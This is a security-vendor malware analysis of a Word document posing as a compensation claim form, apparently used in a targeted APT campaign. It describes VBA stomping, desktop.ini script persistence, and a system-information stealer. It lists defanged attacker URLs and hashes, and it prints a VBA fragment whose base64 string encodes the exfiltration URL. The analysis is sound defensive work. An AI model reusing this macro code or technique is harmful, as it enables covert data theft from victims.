Attacker Distributing Malicious Word Document Written as Compensation Claim Form

A malicious word document file written as ‘compensation claim form’ is being distributed again. This is speculated to be a targeted APT attack. The exact malware that used the identical document format was also discovered back in March, and the ASEC team published a post that analyzes the malware in the ASEC blog. The currently discovered word document was made recently and it contains the same content as the previous attack, but it operates differently. In this post, the team will explain the features and characteristics of the newly discovered ‘compensation claim form’ malicious word document, as well as related files strongly suspected of having been made by the same attacker (developer).

  • Filename: Compensation Claim (form).doc
  • SHA256: 811b42bb169f02d1b0b3527e2ca6c00630bebd676b235cd4e391e9e595f9dfa8
  • Original Author: Network Group
  • Last Modified By: Naeil_EnglishStart
  • Document Creation Date: March 2nd, 2021 9:01:00 A.M.
  • Last Modified At: June 7th, 2021 02:23:00Z

The person who initially created the word document and edited it last is the same as the one responsible for the ‘compensation claim form’ discovered in March. It appears that the attacker recently edited the bait document used in the last attack and reused it in the current attack.

The word document is operated with the malicious VBA code. The VBA code was saved as an html file to bypass anti-malware detection, but this does not affect its operation. The malware that was used for the attack in March had the VBA code saved as .yml file and referenced the external URL with the template injection.

<Relationship Id="rId1" Type=http://schemas.microsoft.com/office/2006/relationships/vbaProject Target="asdgfa.html"

The VBA code is stomped, and the main malicious VBA function is run when text input (Selection.Type Text) occurs. Just opening the word document does not run the malicious feature. The following are the activities that are carried out after the VBA code is run.

  1. Creates and runs Visual Basic Script file with filename %AppData%\desktop.ini
  2. Creates Visual Basic Script file with filename %AppData%\Microsoft\desktop.ini
  3. Creates Internet Explorer (iexplore.exe) shortcut file in the startup directory (automatic execution trigger)
  4. Internet Explorer shortcut file runs %AppData%\Microsoft\desktop.ini file

The %AppData%\Microsoft\desktop.ini file that is finally run through the VBA code has a feature of connecting to a certain blog post and running its data after reading it. The file reads the web-uploaded malicious binary in real-time to run it. The data is currently deleted, but we could check its feature through the data that had been secured in advance.

  • Attacker’s web page: hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html

The final feature that is run using the data leaks the user system information. It appears that this is to scout the infected system. The domain for ‘compensation claim form’ discovered in March was again used as the attacker’s server URL.

  • (Attack in March) hxxp://ftcpark59[.]getenjoyment[.]net/1703/v[.]php
  • (Attack in June) hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php
  1. Collects list of currently running service processes
  2. Collects OS information
  3. Collects .NET version information
  4. Collects Microsoft Office Excel program version information
  5. Collects list of recent files
  6. Collects list of shortcuts pinned to the taskbar
  7. Sends collected information to attacker server in parameters

The current ‘compensation claim form’ malicious word document file has one feature that identifies the attacker. The word document includes the VBA macro function ‘aaaaaaaaaaaa’ that cannot be run normally because it is not defined. However, the ‘aaaaaaaaaaaa’ function was used in other malicious word documents for targeted attacks, and it can be normally defined and called. It is likely that the attacker shared some parts of the VBA macro code when creating the malware.

Function ujmlkl()
 On Error Resume Next
    If (qazwsx = 7) Then
    
        vfgbvcd = Application.Version
        uname = Application.UserName
        os = System.OperatingSystem
        sv = System.Version
        rdxvdw = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXNcXA"))
        ki87ujhy = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXA"))
        recent = tgbyhn
        dfresxcvfd = aaaaaaaaaaaa("aHR0cDovLzIwMC4yMDAuMjAwLjIwMC90ZXN0L3YucGhw")
        who = "shp"

The following is the list of malicious word document files that had the aaaaaaaaaaaa function and a function that calls it. The operation methods are all different, but the documents are all recently confirmed APT targeted attack malware. AhnLab is assuming that the attacker (developer) is the same attack group from North Korea.

  • April 17th – Compensation Claim Form.doc
  • April 15th – [Questionnaire] 2021 Data-based Future Prospect Research_(Peace and Security).doc
  • April 15th – [Questionnaire] 2021 Data-based Future Prospect Research_(Peace and Security).doc
  • March 25th – Planned Questionnaire.doc

AhnLab’s anti-malware product, V3, detects the related targeted attack malicious word documents and automatically categorizes them.

[File Detection]

Downloader/DOC.Generic
Downloader/DOC.Agent

[IOC]

0821884168a644f3c27176a52763acc9
10b4773a35e693761089a4bddae588eb
49a04c85555b35f998b1787b325526e6
6a614ca002c5b3a4d7023faffc0546e1
95c92bcfc39ceafc1735f190a575c60c

hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html
hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php

For the entire code and more detailed explanation of features, check ATIP, ‘the next-generation threat intelligence platform.’

5 3 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments